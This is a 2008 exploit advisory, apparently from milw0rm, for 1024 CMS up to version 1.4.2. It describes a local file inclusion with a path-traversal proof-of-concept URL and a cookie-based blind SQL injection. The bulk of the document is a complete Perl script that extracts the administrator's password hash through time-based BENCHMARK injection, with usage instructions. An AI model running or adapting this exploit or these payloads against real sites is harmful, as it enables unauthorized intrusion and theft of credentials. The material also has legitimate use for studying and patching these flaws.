1024 CMS 1.4.2 - Local File Inclusion / Blind SQL Injection

# Author:	__GiReX__
# mySite:	girex.altervista.org
# Date:		13/04/2008 

# CMS: 		1024 CMS <= 1.4.1 and 1.4.2 (beta)
# Site:		1024cms.com

# Bug1:		Local File Inclusion
# Need:		magic_quotes_gpc = Off / register_globals = On

# Bug2:		Cookie Blind SQL Injection 
# Exploit:	Admin Hash Retrieve Exploit
# Need:		magic_quotes_gpc = Off


# Bug1: Vuln Code: pages/print/default/ops/news.php
   
  <?php
     if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
     include("./lang/".$lang."/news/default.php");

# $lang is unset so we can exploit through local file inclusion


# Include a local file in CMS directory
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00



# Bug2: Vuln Code: /includes/system.php: Lines 66-71

  if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) &&       
      isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){
	 $_SESSION['logged'] = $_COOKIE['cooklogged'];
	 $_SESSION['user'] = $_COOKIE['cookuid'];
	 $_SESSION['type'] = $_COOKIE['cooktype'];

	$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users 
        WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'") 
        or die("Cannot check combination: ".mysql_error());

# We can exploit this vulnerable query editing our cookies and making a blind sql injection


###  Start Exploit  ###

#!/usr/bin/perl -w
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
# Admin Hash Retrieve Exploit

use LWP::UserAgent;
use HTTP::Request;

if(not defined $ARGV[0])
{
	print "usage: perl $0 [host] [path]\n";
	print "example: perl $0 localhost /1024/\n";
	exit;
}

my $client =  new LWP::UserAgent;
my @cset   =  (48..57, 97..102); 
my $hash   =  undef;
 
my $host  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
   $host .=  $ARGV[1] unless not defined $ARGV[1];

banner();
check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n";
syswrite(STDOUT, "[+] Admin Hash: ");

for($j = 1; $j <= 32; $j++)
{  
    for($i = 0; $i <= $#cset; $i++)
    {
        $pre_time = time();	
	
	 $rv = check_char($cset[$i], $j);
	 $post_time = time();	 
	
         if($post_time - $pre_time > 3 and $rv)
	 {
	     $hash .= chr($cset[$i]); 
             syswrite(STDOUT, chr($cset[$i]), 1);
	     last;
	 }
    }
}

if(not defined $hash or length($hash) != 32)
{
     print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n";
}
else 
{
     print STDOUT "\n[+] Exploit terminated\n\n";
}


sub banner
{
   print "\n";
   print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n";
   print "[+] Admin Hash Retrieve Exploit\n";
   print "[+] Coded by __GiReX__\n";
   print "\n";
}

sub check_vuln
{
  my $target = shift;

     $get = new HTTP::Request(GET, $target);
     $get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");

     $res = $client->request($get);
     
     if($res->is_success) 
     {
         return 1 if $res->as_string =~ /Cannot check combination/;
     }
     else
     {
	die "[-] Invalid target : ${target}\n\n";
     }

  return 0;
}

sub check_char
{
  my ($char, $n) = @_;
   
    $get->header(Cookie =>  'cookpass=-1\'+AND+'.
			    'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
			    'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
                            'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
			    'cookuid=1; cooktype=1; cooklogged=1; cookuser=1'); 

    $res = $client->request($get);

  return $res->is_success;
}

# milw0rm.com [2008-04-13]